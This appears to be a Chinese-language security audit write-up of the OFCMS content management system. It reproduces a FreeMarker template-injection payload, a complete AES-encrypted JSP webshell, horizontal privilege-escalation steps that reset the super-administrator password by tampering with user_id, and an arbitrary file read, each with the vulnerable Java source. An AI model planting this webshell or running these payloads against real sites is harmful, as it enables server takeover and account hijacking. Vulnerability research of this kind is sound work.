win+R
cmd
mysql -hlocalhost -uroot -p
(然后输入数据库密码)
show variables like'%time_zone';
set global time_zone = '+8:00';
没配置环境变量的,看这个文章
https://blog.csdn.net/liuqiker/article/details/102455077
配置成功效果图如下
在Deployment配置一下
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DROP TABLE IF EXISTS `of_cms_access`; CREATE TABLE `of_cms_access` ( `access_i' at line 21
这里就是写入文件,我们在admin目录下写入eek1.xml文件。
通过上面任意文件读取漏洞去读取一下
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("calc") }
eek.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
漏洞分析
文件位置ofcms-master\ofcms-api\src\main\java\com\ofsoft\cms\api\v1
package com.ofsoft.cms.api.v1;
import com.jfinal.plugin.activerecord.Db;
import com.ofsoft.cms.api.ApiBase;
import com.ofsoft.cms.core.annotation.Action;
import com.ofsoft.cms.core.api.ApiMapping;
import com.ofsoft.cms.core.api.RequestMethod;
import com.ofsoft.cms.core.api.check.ParamsCheck;
import com.ofsoft.cms.core.api.check.ParamsCheckType;
import com.ofsoft.cms.core.utils.IpKit;
import java.util.Map;
/**
* 评论接口
*
* @author OF
* @date 2019年2月24日
*/
@Action(path = "/comment")
public class CommentApi extends ApiBase {
/**
* 获取内容信息
*/
@ApiMapping(method = RequestMethod.GET)
@ParamsCheck(
{@ParamsCheckType(name = "comment_content"), @ParamsCheckType(name = "content_id"),
@ParamsCheckType(name = "site_id")})
public void save() {
try {
Map params = getParamsMap();
params.put("comment_ip", IpKit.getRealIp(getRequest()));
Db.update(Db.getSqlPara("cms.comment.save", params));
rendSuccessJson();
} catch (Exception e) {
e.printStackTrace();
rendFailedJson();
}
}
}
超级管理员后台界面。
普通管理员后台界面
漏洞复现
我们先以普通管理员登录
点击右上角,修改密码
在此处burp抓包
修改id为1,密码任意
修改前admin的密码是admin
修改后为admin,密码是eek
漏洞分析
漏洞文件:\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java的respwd方法
...
public void respwd() {
Mapparams = getParamsMap();
String password = (String) params.get("password");
String newpassword = (String) params.get("newpassword");
if (!password.equals(newpassword)) {
rendFailedJson("两次密码不一致!");
return;
}
Record record = new Record();
if (!StringUtils.isBlank(password)) {
password = new Sha256Hash(password).toHex();
record.set("user_password", password);
}
record.set("user_id", params.get("user_id"));
try {
Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);
rendSuccessJson();
} catch (Exception e) {
e.printStackTrace();
rendFailedJson(ErrorCode.get("9999"));
}
}...
现在有超级管理员,admin/123 普通管理员,eek/123
漏洞复现
首先以普通管理员身份登录,然后点击右上角,基本资料
在此处burp抓包
修改信息,user_id改为1,密码修改为admin
以系统管理员身份登录
成功登录
漏洞分析
漏洞文件:\ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java的update方法
...
public void update() {
Mapparams = getParamsMap();
String password = (String) params.get("password");
if (!StringUtils.isBlank(password)) {
password = new Sha256Hash(password).toHex();
params.put("user_password", password);
}
params.remove("password");
String roleId = (String) params.get("role_id");
if (!StringUtils.isBlank(roleId)) {
SqlPara sql = Db.getSqlPara("system.user.role_update", params);
Db.update(sql);
}
params.remove("role_id");
Record record = new Record();
record.setColumns(params);
try {
Db.update(AdminConst.TABLE_OF_SYS_USER, "user_id", record);
rendSuccessJson();
} catch (Exception e) {
e.printStackTrace();
rendFailedJson(ErrorCode.get("9999"));
}
}
...
这里不能直接编辑,burp抓个包。
web.xml文件如下所示
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://td/web-app_2_3.dtd" >
Archetype Created Web Application
org.apache.shiro.web.env.EnvironmentLoaderListener
shiro
org.apache.shiro.web.servlet.ShiroFilter
.........
读取成功
package com.ofsoft.cms.admin.controller.cms;
...
public void getTemplates() {
//当前目录
String dirName = getPara("dir","");
//上级目录
String upDirName = getPara("up_dir","/");
//类型区分
String resPath = getPara("res_path");
//文件目录
String dir = null;
if(!"/".equals(upDirName)){
dir = upDirName+dirName;
}else{
dir = dirName;
}
File pathFile = null;
if("res".equals(resPath)){
pathFile = new File(SystemUtile.getSiteTemplateResourcePath(),dir);
}else {
pathFile = new File(SystemUtile.getSiteTemplatePath(),dir);
}
File[] dirs = pathFile.listFiles(new FileFilter() {
@Override
public boolean accept(File file) {
return file.isDirectory();
}
});
if(StringUtils.isBlank (dirName)){
upDirName = upDirName.substring(upDirName.indexOf("/"),upDirName.lastIndexOf("/"));
}
setAttr("up_dir_name",upDirName);
setAttr("up_dir","".equals(dir)?"/":dir);
setAttr("dir_name",dirName.equals("")?SystemUtile.getSiteTemplatePathName():dirName);
setAttr("dirs", dirs);
/*if (dirName != null) {
pathFile = new File(pathFile, dirName);
}*/
File[] files = pathFile.listFiles(new FileFilter() {
@Override
public boolean accept(File file) {
return !file.isDirectory() && (file.getName().endsWith(".html") || file.getName().endsWith(".xml")
|| file.getName().endsWith(".css") || file.getName().endsWith(".js"));
}
});
setAttr("files", files);
String fileName = getPara("file_name", "index.html");
File editFile = null;
if (fileName != null && files != null && files.length > 0) {
for (File f : files) {
if (fileName.equals(f.getName())) {
editFile = f;
break;
}
}
if (editFile == null) {
editFile = files[0];
fileName = editFile.getName();
}
}
setAttr("file_name", fileName);
if (editFile != null) {
String fileContent = FileUtils.readString(editFile);
if (fileContent != null) {
fileContent = fileContent.replace("<", "<").replace(">", ">");
setAttr("file_content", fileContent);
setAttr("file_path", editFile);
}
}
if("res".equals(resPath)) {
render("/admin/cms/template/resource.html");
}else{
render("/admin/cms/template/index.html");
}
}
......
https://blog.csdn.net/liuqiker/article/details/102455077
https://blog.csdn.net/xd_2021/article/details/123611835
https://blog.csdn.net/HBohan/article/details/121422523
https://blog.csdn.net/weixin_44522540/article/details/122844068
征集原创技术文章中,欢迎投递
投稿邮箱:[email protected]
文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关
通过审核并发布能收获200-800元不等的稿酬。